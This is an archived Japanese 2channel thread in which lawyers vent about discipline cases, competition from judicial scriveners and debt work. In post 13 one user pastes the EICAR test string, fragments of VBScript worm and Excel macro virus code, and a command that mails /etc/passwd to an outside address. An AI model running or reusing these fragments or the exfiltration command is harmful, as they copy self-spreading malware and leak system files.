2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【新法続々】弁護士本音talkスレPart23【日々勉強】

1 :MS754 ◆yGUnQdhyV2 :2006/06/09(金) 14:54:32 ID:2Wp98dFq
前スレ↓
【連休中は】弁護士本音talkスレPart22【居留守】
http://school5.2ch.net/test/read.cgi/shikaku/1146261889/
注意書き,リンク集などは>>2-10あたりに・・・

2 :MS754 ◆yGUnQdhyV2 :2006/06/09(金) 14:55:18 ID:2Wp98dFq
○こちらは弁護士の方や関係者などの雑談スレになります。
○特定の個人名、事務所名、電話番号、住所などは絶対に書き込まないでください。
○司法試験関係は 「司法試験板」 http://school5.2ch.net/shihou/ がございます。
○法律相談は、最寄りの法律相談センターや弁護士会、各種相談スレまたは下記スレへ。
   やさしい法律相談 Part177
http://school5.2ch.net/test/read.cgi/shikaku/1149606200/
------------------------------------------------------------
○弁護士の本音トークスレです。
 したがって,それ以外の話題,たとえば
 ×弁護士に対する相談
 ×弁護士以外の人の過度のスレ参加
 はなるべくご遠慮ください。
○荒らしは無視の方向でしかるべく。
○なるべくsage進行で。

3 :MS754 ◆yGUnQdhyV2 :2006/06/09(金) 14:55:52 ID:2Wp98dFq
過去スレその1
1:【雑談】弁護士本音talkスレ その2【ため息】
http://school.2ch.net/test/read.cgi/shikaku/1059490362/
2:【雑談】弁護士本音talkスレ その3【ため息】
http://school.2ch.net/test/read.cgi/shikaku/1065526506/
3:【希望】弁護士本音talkスレ その4【失望】
http://school2.2ch.net/test/read.cgi/shikaku/1074280112/
4:【希望】弁護士本音talkスレ その5【失望】
http://school4.2ch.net/test/read.cgi/shikaku/1080568884/
5:【夏期】弁護士本音talkスレ その6【休廷】
http://school4.2ch.net/test/read.cgi/shikaku/1087307654/
6:【夏バテ】弁護士本音talkスレpart7【ビール腹】
http://school4.2ch.net/test/read.cgi/shikaku/1091890714/
7:【ようこそ】弁護士本音talkスレPart8【第58期よ】
http://school4.2ch.net/test/read.cgi/shikaku/1096634157/
8:【諸行】弁護士本音talkスレPart9【無常】
http://school4.2ch.net/test/read.cgi/shikaku/1099052870/
9:【忘年会】弁護士本音talkスレpart10【新年会】
http://school4.2ch.net/test/read.cgi/shikaku/1102088211/
10:【確定】弁護士本音talkスレpart11【申告】
http://school4.2ch.net/test/read.cgi/shikaku/1107791882/
11:【黄金】弁護士本音talkスレpart12【週間】
http://school4.2ch.net/test/read.cgi/shikaku/1113138219/


4 :MS754 ◆yGUnQdhyV2 :2006/06/09(金) 14:56:23 ID:2Wp98dFq
過去スレその2
12:【相談は】弁護士本音talkスレpart13【他のスレで】
http://school4.2ch.net/test/read.cgi/shikaku/1115537611/
13:【クールビズ】弁護士本音talkスレpart14【してる?】
http://school5.2ch.net/test/read.cgi/shikaku/1118220156/
14:【国選増額】弁護士本音talkスレ15【熱烈希望】
http://school5.2ch.net/test/read.cgi/shikaku/1122387067/
15:【風立ちぬ】弁護士本音talkスレ16【爽やかに】
http://school5.2ch.net/test/read.cgi/shikaku/1125622482/
16:【WELCOME】弁護士本音talkスレPart17【58期】
http://school5.2ch.net/test/read.cgi/shikaku/1128939534/
17:【食欲の秋】弁護士本音talkスレPart18【ダイエット】
http://school5.2ch.net/test/read.cgi/shikaku/1130480126/
18:【メリー】弁護士本音talkスレPart19【クリスマス】
http://school5.2ch.net/test/read.cgi/shikaku/1133217229/
19:【サヨナラ】弁護士本音talkスレPart20【みなし弁済】
http://school5.2ch.net/test/read.cgi/shikaku/1137164618/
20:【花見は】弁護士本音talkスレPart21【まだか?】
http://school5.2ch.net/test/read.cgi/shikaku/1141830790/
21:【連休中は】弁護士本音talkスレPart22【居留守】
http://school5.2ch.net/test/read.cgi/shikaku/1146261889/


5 :MS754 ◆yGUnQdhyV2 :2006/06/09(金) 14:57:42 ID:2Wp98dFq
関連スレ
【ドラマと】事務員本音talkスレ5頁目【大違い】
http://school5.2ch.net/test/read.cgi/shikaku/1145260846/
■裁判官の部屋 その3■
http://school5.2ch.net/test/read.cgi/shikaku/1137575282/
【ピーピー】検事になりたいんですがその12【ゴロゴロ】
http://school5.2ch.net/test/read.cgi/shihou/1147615810/
■若手法曹スレッドpart1■
http://school5.2ch.net/test/read.cgi/shikaku/1112780497/
裁判所書記官だけでマターリしようよ
http://society3.2ch.net/test/read.cgi/koumu/1141056988/

6 :MS754 ◆yGUnQdhyV2 :2006/06/09(金) 14:59:24 ID:2Wp98dFq
弁護士のためのサイト集(二弁知財法研究会)
http://www.dntba.ab.psiweb.com/link/bengoshi-link.html
法令データ提供システム
http://law.e-gov.go.jp/cgi-bin/idxsearch.cgi
総本山
http://www.nichibenren.or.jp/
東弁
http://www.toben.or.jp/
一弁
http://www.ichiben.or.jp/
二弁
http://www.niben.jp/
裁判所
http://www.courts.go.jp/
岡口裁判官のページ
http://okaguchi.at.infoseek.co.jp/top.htm


7 :無責任な名無しさん:2006/06/09(金) 15:48:23 ID:g7a5pISV
スレ立て乙

8 :無責任な名無しさん:2006/06/09(金) 16:21:58 ID:nMa8ddZK
乙です

9 :無責任な名無しさん:2006/06/09(金) 22:09:24 ID:zB9JaEm5
自由と正義を読んだけど,懲戒中に仕事をやって,
元の懲戒より長い期間懲戒になってるのは,
なんか哀れだな。

懲戒されると,そんなに食うに困るのか。

10 :無責任な名無しさん:2006/06/09(金) 22:57:30 ID:505KLFgu
まだ読んでないけど、共同事務所なら業務停止期間中事務員として
給料もらって働かせてもらうということはできるんでしょうかね?

11 :無責任な名無しさん:2006/06/09(金) 23:00:58 ID:IAugZ/4p
>>10
弁護士が給料もらって働いてもいいのか?
営業許可ってもういらないんだっけ?

12 :無責任な名無しさん:2006/06/09(金) 23:24:06 ID:npUoRHxn
俺は控訴は時間稼ぎでしかないと言い切った控訴趣意書を読んでみたい。


13 :厨房よけ:2006/06/09(金) 23:51:36 ID:i51H8lQY
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
ms-its:mhtml:file://c:\
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
THE END!!



14 :行き詰まり弁護士 ◆BAKA/8y6zk :2006/06/10(土) 04:23:06 ID:M/Fj9xGw
>>MS754先生
毎度毎度スレ立て乙です。

>>13
ゴルァ!!!!

15 :無責任な名無しさん:2006/06/10(土) 07:50:21 ID:A52APBgf
>>13

これは厨房よけではなくて、これ以上不満を書き込まれると困ると思った日弁連の回し者でしょうね

16 :無責任な名無しさん:2006/06/10(土) 08:15:51 ID:A52APBgf
秋田の弁護士なかなかやるねえ。
ほかも見習え。

http://www.asahi.com/national/update/0610/TKY200606090486.html

17 :無責任な名無しさん:2006/06/10(土) 10:14:41 ID:om7rUAks
2年も業務停止くらったらさすがにきついな。

18 :無責任な名無しさん:2006/06/10(土) 10:39:42 ID:fPSn+fex
>>16
諸刃の刃のような

19 :無責任な名無しさん:2006/06/10(土) 10:56:43 ID:2wd854sC
日弁の会員情報検索ページが壊れてる・・・・。
検索条件で絞り込みができない。
システム入れ替えたせいか。

会員用のページに入るときのID・PASSをその都度入力しなければならなくなった。
見る人激減しそう・・・・。
誰か日弁のコンピュータ委員に言ってください。

20 :無責任な名無しさん:2006/06/10(土) 11:38:13 ID:HMpiqcNn
あれ,最近,1度,IDなど入力せよという表示が出たけど,
2度目は入力しなくても入れたが。

もっとも,先ほど会員ページに入ろうとしたら,
session open error
という表示が現れて,入れなかった。


21 :無責任な名無しさん:2006/06/10(土) 11:42:20 ID:6UQoEZa6
>>20
それはクッキー利用の仕様
一定時間以内ならID&パス不要
そういう仕様のところ結構あるよ

22 :無責任な名無しさん:2006/06/10(土) 12:27:10 ID:/FUVSpoN
>>16
なんかここ最近注目事件は、弁護人が早い段階で被疑者の供述内容を
明らかにする流れが作られてるな。
メディアスクラムの問題と弁護人の情報開示の問題は別じゃないか。
正直、全く理解できない。

23 :無責任な名無しさん:2006/06/10(土) 12:39:20 ID:6UQoEZa6
一度でもTVに顔出せば、地元からの私選弁護依頼が増える

24 :無責任な名無しさん:2006/06/10(土) 12:50:38 ID:dMDxj3as
依頼人が若くて可愛くて話が面白くてちょっと嬉しい

25 :無責任な名無しさん:2006/06/10(土) 13:10:26 ID:gkU/0QON
プロポ抜群で前かがみで身を乗り出すたびに……
これでノービザの売春防止法違反でなければ_| ̄|○

26 :無責任な名無しさん:2006/06/10(土) 13:53:51 ID:dMDxj3as
>>25
君の気持ちがよく分かる。

27 :無責任な名無しさん:2006/06/10(土) 15:39:30 ID:zFSrIxk4
質問です。
仕事で知り合った人から逆恨みされて嫌がらせされた経験のある弁護士さんはいますか?


28 :無責任な名無しさん:2006/06/10(土) 16:04:47 ID:yriNUpLm
【トムとジェリーの最終回】 

ジェリーが大人になった頃トムはもうこの世にいませんでした。
トムは自分の命の終わりがすぐ傍まで来ているのを知ったとき、
こっそりジェリーの前から姿を消しました。
ジェリーの前で弱って涙もろくなった自分を見せたくなかったのです。
トムはジェリーの心の中ではずっと喧嘩相手として生きつづけたかったのです。
トムがいなくなったのに気づいたときジェリーは悲しみはしませんでしたが、退屈になるなと思いました。
トムとの喧嘩は最高にスリルのあるゲームでしたから。
胸の奥が不思議にチクチクはするのですが、
それが何なのか、 ジェリーにはよくはわかりませんでした。
トムの願い通り、ジェリーの心の中でトムはいつまでも仲の悪い喧嘩相手でした。


29 :無責任な名無しさん:2006/06/10(土) 16:05:38 ID:yriNUpLm

そんなある日ジェリーの前に一匹の猫が現れました。
トムよりのろまで体も小さい猫です。
喧嘩相手のトムがいなくなって寂しかったジェリーは、
今度はこの猫を喧嘩相手にしようと考えました。
そこでジェリーは、
穴のあいた三角チーズが仕掛けられたねずみ取りを利用して、
その猫に罠をかけることにしました。
いつもトムにしていたように。
ジェリーは物陰に隠れて、ねずみを求めて猫がねずみ取りの近くに来るのを待っていました。
そして思惑通り猫が罠に向かって近づいてきます。
ジェリーはしめしめと思いました。
いつものように、自分がねずみ取りにひっかかるふりをして、逆に猫をねずみ取りにかけてやるんだ。
うふふ。
手か尻尾を挟んだ猫の飛び上がる姿が頭に浮かび愉快です。
でも、その猫はトムではありません。
猫はチーズの近くまで来たとき、ジェリーが出てくるより早く美味しそうなねずみの匂いに気づき、
目にもとまらぬ速さで隠れていたジェリーに襲いかかってきました。
ジェリーはいつもトムから逃げていたように逃げましたが、
トムよりのろまなはずの猫にすぐに追いつかれてしまい、体をガブリと噛まれました。
ジェリーも噛みつき返しましたが、 トムより体が小さいはずの猫は平気です。
血まみれのジェリーは薄れ行く意識の中で、本当は鼠が猫と喧嘩して勝てるわけがないことと、
いつもトムはジェリーに「してやられた」ふりをして、
わざとジェリーを捕まえないでいたことを、そのとき始めて知ったのです。
トムの大きな優しさと友情に気づいたのです。
そしてトムがいなくなった時の胸の奥のチクチクの正体にも気づきました。
かけがえのない友を無くした悲しみでした。
ジェリーの魂が体を抜けた時、空の上には優しく微笑みジェリーを待っているトムがいました。
「また喧嘩ができるね」
「のぞむところさ、今度こそは捕まえてやるぞ」

END

30 :無責任な名無しさん:2006/06/10(土) 16:44:18 ID:A52APBgf
弁護士に責任がないのに弁護士のせいにするDQNはしょっちゅうです。
そういう性格だからトラブルを起こしてしまうのです。

31 :無責任な名無しさん:2006/06/10(土) 16:46:02 ID:gkU/0QON
>>30

禿同

32 :無責任な名無しさん:2006/06/10(土) 16:48:10 ID:wl75z5dg
>>19
ホームページの担当はコンピュータ委員会じゃないよ。
日弁連に聞いたら、システム更新に伴う一部的な不具合で、
復旧にもうしばらくかかるとか。いずれにせよ、仕様変更して
不便にするつもりはないんだってさ。



33 :無責任な名無しさん:2006/06/10(土) 16:49:55 ID:gkU/0QON
日弁連の仕様変更は不便になったばかりじゃなk>司法制度改革悪

34 :無責任な名無しさん:2006/06/10(土) 16:53:33 ID:A52APBgf
大体あの会員専用ページはなんの役にも立ちません。
日弁連の無能さを象徴するかのようです。

35 :無責任な名無しさん:2006/06/10(土) 17:01:48 ID:1rNrE+In
 うーん、月曜の朝には出来上がっている必要がある書面を起案しに事務所に出てきたが、やりたくない病が出て、3時間ぐらいネットで遊んでいる。
 明日は、日帰り出張なのだが、夕方には帰ってこれるからそれからやればいいじゃんというささやきが聞こえてくる。
 一方、特に用事のない今日ですら出来ないのに、出張帰りに出来るわけがないというささやきも・・・。
それほどやる気が出ず、しかも私の見るところ分が悪く、私の能力ではたいした反論も出来ないけど、わりと分量のある書面を起案しなければならない。
 どうすればいいのだろう・・・。映画でも見にいこうっかなぁ・・・。

36 :無責任な名無しさん:2006/06/10(土) 17:09:52 ID:wORpDIui
>>35 私もネットで遊んでしまっています。
どんどんやる気がなくなってきて、人間をやめたくなってきます。

37 :無責任な名無しさん:2006/06/10(土) 17:13:44 ID:gkU/0QON
土日出勤の隘路だよね(漏れも2chとTV_| ̄|○

38 :無責任な名無しさん:2006/06/10(土) 17:20:28 ID:1rNrE+In
 映画を見に行くことに決定。つくづく自分はダメ人間だと思ってしまう。
期日に約束した書面を出さないということだけは避けるようにがんばろう。それをやってしまうと本当に歯止めが利かなくなるような気がするし。

39 :無責任な名無しさん:2006/06/10(土) 17:33:49 ID:ZE+RZcVd
なんだか、自分の書き込みを見ているかのようだ。

40 :無責任な名無しさん:2006/06/10(土) 17:40:04 ID:gkU/0QON
>>39
漏れも
本の現行は既に〆切から1か月経過(泣。

41 :無責任な名無しさん:2006/06/10(土) 18:09:08 ID:fAnti46S
>27
相手方だったばあさんから(こちらが全面勝訴)、弁護士が不祥事を起こす事件が報道されたり、
季節の変わり目になると電話がかかってきます。
 で、散々悪口を言われ、最後は「本当だったらあんたを打ち殺してやりたい」と言われ、あんた
のせいで電話代がまたかかったと言われて電話を切るのです。

42 :無責任な名無しさん:2006/06/10(土) 19:44:38 ID:LhpaBeNx
くえないから多重相手やろうと思うんだけど現況どう?
司法書士が多くなってるってほんと?
五年後あたり、いくつかのなまけ弁は、やりて書士にとってかわられたりするんだろうか
うちのボスが顧問企業の法務部のやつから『司法書士さんのほうが、早くて明確な答えがかえってくるんですけど』
といわれたらしく、きげんわるかったしな

43 :無責任な名無しさん:2006/06/10(土) 19:55:59 ID:SCON8oek
>>42
会社法の細かいところは、
書士の方が詳しかったりする。

44 :無責任な名無しさん:2006/06/10(土) 20:06:24 ID:6mBnrkmQ
42は手の込んだ司法書士の荒らしの希ガス

45 :無責任な名無しさん:2006/06/10(土) 20:23:21 ID:LhpaBeNx
ざんねんながら、弁二年目38才だ

46 :無責任な名無しさん:2006/06/10(土) 21:02:10 ID:1FLE1QFY
あなた、Sさんでしょ?

47 :無責任な名無しさん:2006/06/10(土) 21:35:56 ID:IiZmBzgf
>>42
今参入しないと、いちばん美味しいところを逃すことになるよ。
もうすぐグレーゾーンもなくなるし。
ちょうどあなたの年代がバブルがはじけた直後に新卒だったように。

48 :無責任な名無しさん:2006/06/10(土) 22:10:41 ID:LhpaBeNx
うちのボスいわく
多重相手の仕事は底辺の弁がする仕事だ
と、いうので手が出しにくい。
俺は業界歴浅いせいか仕事に優劣はないと考えてるが
やはり業界ではそういう見方もあるわけなのかな?

49 :無責任な名無しさん:2006/06/10(土) 22:16:31 ID:CaeLUOik
>>48
うちでもボスは同様の見方をしている。
曰く「あんな仕事は司法書士に呉れてやればいいんだよ」
弁護士としての知識や技術が無くてもできると。
現に困っている人がいる以上、手を出して悪いことはないと思うのだが・・・

50 :無責任な名無しさん:2006/06/10(土) 22:25:24 ID:IiZmBzgf
>>48-49
まあ、そういう見方が多重債務者の救済を遅らせてきたということさ。

51 :無責任な名無しさん:2006/06/10(土) 22:44:00 ID:ynM5Q0Tx
ロー成弁・司法書士は企業の法務部員になるだろうな。
5年後、もっとコキ使われる予感w


52 :無責任な名無しさん:2006/06/10(土) 22:57:09 ID:LhpaBeNx
やはり、そういう意見があるのか
俺は書士合格、司法合格という順番できたので、この年になったんだが
ローによる弁の質低下で、企業法務辺りは書士競合するようになるんだろうか
顧客が毎回うちに質問した後、書士に同じ質問してるあたりで薄々そんな危機を感じてる
優秀でない俺は、みんなと違ってかなり合格するのに苦労し月日を使った
はれて合格したがローでの弁大量生産、逆に書士の難度は維持
かなりの焦りとをかんじてる。すまん、くらい話ばかりで

53 :無責任な名無しさん:2006/06/10(土) 23:52:14 ID:3JREQns6
 イングランド勝った。

54 :無責任な名無しさん:2006/06/10(土) 23:55:29 ID:ynM5Q0Tx
毎年3000人+司法書士だから・・・暗くなって当然さ。
ふと思い出した、公認会計士の愚痴ってのが、今、身に抓まされるよ。
企業内に公認会計士・税理士がいて、既に決算・有証報告が上がってるんだと・・
署名・捺印のためだけに、呼び出されているって言うんだよ。
責任だけ外部会計士持ちだよって。
弁も例外じゃない時代到来。ますます暗いな。申し訳ない。

55 :無責任な名無しさん:2006/06/11(日) 08:57:57 ID:c65q35Tp
クレサラは、仕事としてはつまらんが、
やりがいはあるよ。
受任してやると、泣き出す人が結構いる。

56 :ダブルライセンス:2006/06/11(日) 10:19:10 ID:ULooo16v
>公認会計士の愚痴ってのが、今、身に抓まされるよ。
>企業内に公認会計士・税理士がいて、既に決算・有証報告が上がってるんだと・・
>署名・捺印のためだけに、呼び出されているって言うんだよ。
>責任だけ外部会計士持ちだよって。

俺が関与していた銀行にはCPAが何人かいたが
これはない。
インハウスがいる企業も,これはないでしょ。
率直に言って,インハウスの能力は弁一般の水準からすると
低いでしょ。
企業にいるCPAの場合も同じ。もちろん,勤務先の業務に対する理解はあるが,
CPAとしての能力は低い。
それと,企業内のCPAの地位が低いため,
高いレベルの情報も入ってこない。


57 :無責任な名無しさん:2006/06/11(日) 10:53:24 ID:FEPAdYYx
インハウスの能力が弁一般の水準より低いという根拠は?

58 :無責任な名無しさん:2006/06/11(日) 12:07:09 ID:PL6NZGxU
根拠も糞も経験上そうだろ
細かな問題についてはよく知ってたりするが、全体像が見えないまま細かな問題をうじうじ考えてることが多いし。

で、書士の方が云々っていうのは、お前の能力のなさ以外の何者でもない。
債務整理に適当に手を出して、おかしな判決もらってしまって、全国で書証としてお前の名前入りの間抜け判決ばらまかれることを覚悟で債務整理やりなさい。

59 :無責任な名無しさん:2006/06/11(日) 12:17:46 ID:+Q10teU0
千人超えた時点で既に書士のほうが上かもしれない

60 :無責任な名無しさん:2006/06/11(日) 13:00:26 ID:dI7OoYeV
書士が法理士とかに名前かわると、どっちがなんだかわからなくなるな

61 :無責任な名無しさん:2006/06/11(日) 13:01:40 ID:FEPAdYYx
司法書士がロイヤーを名乗りだしてるのも違和感ある

62 :無責任な名無しさん:2006/06/11(日) 13:18:44 ID:NqOeqExC
>>59
禿同です。
弁が弁として、やっていけるのは司法試験の難易度を世間が認知しているからだと思う。
その意味で、既に結論ありきの問題だと思ふが。
現状から5年後を見据えて、弁資格に胡座を駈けるなど大先生の認知症か妄想。
あなたは、澄んだ視点で先を見ている賢弁だと思います。
漏れは、クライアントの受付で、弁の○○ですと名乗ってます。基本的に丁重な扱いを受けてる印象です。
弁という冠が曇った時、起こり得る事態に悲観してます。実体は零細事業主であるからですが・・。
弁三世の漏れは、世代別の弁観の違いを身近に感じてます。
弁一世:食えないから、書士と協調しつつ、食べ繋いだ。
弁二世:黄金期
弁三世:書士を行書レベルにしたいと目論むが、弁大量生産の代替案なし。
したがって、弁四世はないと思ふが。スマソ自爆論になってしもた。


63 :無責任な名無しさん:2006/06/11(日) 14:03:01 ID:hphnUH0G
最近の事情をよく知らないのですが、合格者が千人越えたのは何年前からですか。

64 :無責任な名無しさん:2006/06/11(日) 15:36:23 ID:UF5yXzft
自分の記憶では

50期  600人
51期  700人
52期  750人 ← ここまで2年修習
53期  800人 ← ここから1年半修習
54期 1000人

その数年後 1200人

さらに数年後 1500人

65 :無責任な名無しさん:2006/06/11(日) 17:25:16 ID:Futp3WVz
ここが参考になります。
http://www.moj.go.jp/PRESS/051109-1/17-4syutu.html

平成
  01  506 ( 71)  2.37
  02   499 ( 74)  2.38
  03   605 ( 83)  2.94
  04   630 (125)  2.94
  05   712 (144)  4.02
  06   740 (157)  3.81
  07   738 (146)  3.47
  08   734 (172)  3.35
  09   746 (207)  3.16
  10   812 (203)  3.03
  11  1,000 (287)  3.35
  12   994 (270)  3.13
  13   990 (223)  2.90
  14  1,183 (277)  2.85
  15  1,170 (275)  2.58
  16  1,483 (364)  3.42
  17  1,464 (350)  3.71

66 :無責任な名無しさん:2006/06/11(日) 17:39:36 ID:dI7OoYeV
まずいよな、やっぱり
書士の合格率3%弱にたいして
新司法60%前後となると、世間の見方がちがってくる
いつだったか、国家資格の最難関は司法書士となる模様。みたいな記事が朝日新聞に載っていた
朝日だからスポーツ新聞程度だが、ロー卒が不祥事やらかして
ローの欠陥なんてマスコミがさわぐと数年で世間がかわるから恐いよな

67 :無責任な名無しさん:2006/06/11(日) 17:45:23 ID:FCCGtBmk
合格率だけで言ったら、
17年は司法書士2.8%、行政書士2.62%。
最難関の法律系資格は行政書士だったってか。

68 :無責任な名無しさん:2006/06/11(日) 17:46:58 ID:y4WqJJU8
>>35
懲戒への途乙

69 :無責任な名無しさん:2006/06/11(日) 17:48:58 ID:y4WqJJU8
>>48
今更始めても,客も来ないし,対応も出来ないよ。

70 :無責任な名無しさん:2006/06/11(日) 17:51:52 ID:y4WqJJU8
>>66
書士は試験でなるのは半分くらいでしょ?

71 :無責任な名無しさん:2006/06/11(日) 17:57:47 ID:dI7OoYeV
そうなの?後は認可?
そういえば司法書士が公証人になってたね
民間で初めてだよね。あれはすごいとおもった

72 :無責任な名無しさん:2006/06/11(日) 17:59:01 ID:Futp3WVz
これからの弁護士宣伝必携

  修 習 期

73 :無責任な名無しさん:2006/06/11(日) 18:49:02 ID:vw8MoyqM
書記官上がりが公証人(ただしおいしくないところ)なんてのはよくあるだろうが
>>71はもの知らないな

74 :無責任な名無しさん:2006/06/11(日) 18:56:11 ID:dI7OoYeV
書記官くらいで公証人なれるのか
おれも年くったら公証人になりたいが
弁になっちゃったからだめだな

75 :無責任な名無しさん:2006/06/11(日) 19:32:59 ID:Futp3WVz
昔は特任検事用の支部公証人というポストもあったが。
今は特任検事も研修受けて弁護士となって事務所開業する人が増えたし。

76 :無責任な名無しさん:2006/06/11(日) 19:49:58 ID:XNTrnDs+
>>66

その朝日の記事いつ頃載ってたの?

77 :無責任な名無しさん:2006/06/11(日) 20:05:36 ID:lpPRtFyR
国に選ばれた先生方って、私選弁護よりも、1ランク上なんですよね。
ttp://headlines.yahoo.co.jp/hl?a=20060611-00000012-kyodo-soci
国選弁護人は最低5万円、公判1回7000−9000円で、新設される捜査段階の容疑者の国選弁護人は接見回数などが基準となる・死刑求刑事件や被害者と示談を成立させた場合などは加算され、努力と成果によってめりはりを付けた


78 :無責任な名無しさん:2006/06/11(日) 20:21:57 ID:dI7OoYeV
>>76
去年だったとおもう
具体的な日付は忘れたが、なんかのロー関係の発表があったのと同時だったのはおぼえてる

79 :無責任な名無しさん:2006/06/11(日) 21:57:31 ID:yI3rzVwT
少し前のスレに「お世話になった先生にお礼をしたいのですが」の質問をしたものです。

決着した日の先生との別れ際、先生と握手をした時、
今までたった一人私の味方になってくれた先生への感謝の思いが溢れてきて、私は泣いてしまって
言いたい事の半分もいえませんでした。

言葉を詰まらせる私の手を先生がしっかり握っていてくれました。
先生と一緒だったから、精神的にまいってしまいそうな時も乗り越えて来れました。

最後になりましたが
「親子以上に年齢が離れてるから、恋愛感情はない」と自分では思ってましたが、自分の心に嘘をついていた事に今気がつきました。
先生にとって負担で迷惑でしかないから、私がこんな感情を持ち合わせていることに気付かれないうちに終わって、良かったかも…。
いつの日か先生を好きだったことがいい思い出になりますように。

80 :無責任な名無しさん:2006/06/11(日) 23:36:12 ID:RKHMfyHm
ああ、あれオレじゃなかったんだ。よかった。

81 :無責任な名無しさん:2006/06/11(日) 23:43:09 ID:HkE/Vjvu
>>80
自分の子供くらいの依頼者がいたの?(79は親子ほど離れていると言っているし)
しかも、よかった、って…(ニガワラ

82 :無責任な名無しさん:2006/06/11(日) 23:56:56 ID:5deCXJbg
自分の親くらいの依頼者かもしれんぞ

83 :無責任な名無しさん:2006/06/12(月) 00:08:44 ID:pBbe0y+r
>>82
なるほそ

勝手な想像で、>79→若い女性、代理人→その親くらいかと思ってたな。

>80はどっちが年上なのかな?

84 :無責任な名無しさん:2006/06/12(月) 00:26:31 ID:kSO7UOIT
わー。
私も今依頼中の女子なんですが、同じく親子ほど年の離れた先生に恋してます。
ジェットコースター理論の恋愛だとは思いつつ
分かっていてもやめられるものでもないですしね。
同じような人ってやっぱりいるんですね。なんか嬉しい。

85 :35、38:2006/06/12(月) 01:24:25 ID:jFL4t7wV
 昨日、事務所に出てきたが、結局やらずに帰った書面がやっと出来た。でも、内容は・・・。
分が悪い事件をやると、もっとほかに戦い方があるのではないか、分が悪いというのは自分に対する言い訳ではないか、ほかの弁護士ならもっとうまくやれるのではないかという気持ちに駆られます。
 今までは、分が悪いと判断した事件は、受任前にその旨正直に述べるようにしていますが、増員後は、原告側でもあえて言わずに着手金だけで稼ぐ仕事もしなければならないのかなぁ・・・。
 ちなみに、昨日見に行った映画は、もう一つだった。題名は言わないけど、1のほうが良かった・・・(これでばれる?)。

86 :無責任な名無しさん:2006/06/12(月) 01:27:41 ID:Bas+7Aa4
トリック?
俺も今日見てきたよ。それなりに面白かったけど。

俺はどんな事件でも、とりあえず分が悪いと思う点は最初に強調しておくなw

87 :無責任な名無しさん:2006/06/12(月) 07:41:28 ID:icV4zf0v
>>85
東京とかもうそんな感じなんじゃないの?
なんでこんな事件を受任したんだろうみたいな事件を,わざわざ地方に出張ってまでやってる奴をたまに見ます。
依頼者は旅費日当だけで1回10万円かあ,着手金いくらなんだろう,準備書面は長いけど要件事実落ちてるよ,おまけにそちらは負け筋じゃん,なんて思いながら,訴額200万円の事件の相手をしています。

88 :無責任な名無しさん:2006/06/12(月) 08:26:52 ID:2vLBqzWH
>87
そういうのの被告事件を、何件か持っている。
原告も、何でわざわざ東京の弁護士に頼むのか分からん。
地元の弁護士にはことごとく断られたのか、あるいは東京の弁護士の方が
箔が付くと思っているのか。
こちらに対しては、「生活が苦しく一銭も払うお金はない」などと言うけれど、
じゃあその東京から呼んでる弁護士費用はどこから出てるんだよ。
こういう変な事件を受任する東京の弁護士に限って、電話会議じゃなくて
毎回出頭してくるんだよね。不思議なことに。


89 :無責任な名無しさん:2006/06/12(月) 09:53:07 ID:vCsvQMgr
紆余曲折人生を歩みながら、司法書士試験にパス。登録せず司法試験予備校に通う中
またしても、脇道に逸れつつある今日の頃。
今更、ロー学費工面できないし、非弁ブローカーへの扉が開きつつ、アウトローが口をあけて待っている。
初志貫徹。。。しっかりせねば。(書士の勉強から初め6年目の漏れ。)

90 :無責任な名無しさん:2006/06/12(月) 09:53:59 ID:plGfER2U
俺が思うにクレサラは美容整形外科医みたいな存在だよ。
金は儲かるが業界内での地位は低い。
俺はクレサラ弁護士だが今年の年収は6000万円は固い。
俺はそれでいいと思っている。

91 :無責任な名無しさん:2006/06/12(月) 10:22:44 ID:icV4zf0v
>>88
そうそう。
あれ俺の会だったら懲戒ものだななんて思う。

俺がやってる事件では,地元の弁護士が,裁判しても費用を考えたら割に合わないから止めた方がよいって言っていたようだ。
東京ではどんな説明したのだろうかって思う。


92 :無責任な名無しさん:2006/06/12(月) 10:23:39 ID:icV4zf0v
>>89
これからは非弁ブローカーするんでも,法務博士くらいの学歴を持ってないと難しいね


93 :無責任な名無しさん:2006/06/12(月) 10:56:56 ID:vCsvQMgr
>>法務博士くらいの学歴を持ってないと難しいね。
  法務博士って何ですか? 法学士は持ってますが・・(法学部卒なら皆)
  法学博士だったら・・助教授・教授を経て、弁登ですが・・(研生(修士)・助手期間が長い・永すぎ)

予校ズル休みですが、最近思う。
受験勉強期間の長い生徒ほど、荷物の量・バックの大きさが比例する。
そういう漏れも、2泊3日仕様のトラベルバック・・あぁ〜。


94 :無責任な名無しさん:2006/06/12(月) 11:12:04 ID:3BTPSt4f
事務員が二人立て続けに辞めてちょっと大変・・・・・・
お二人とも優秀な方だったのに残念。
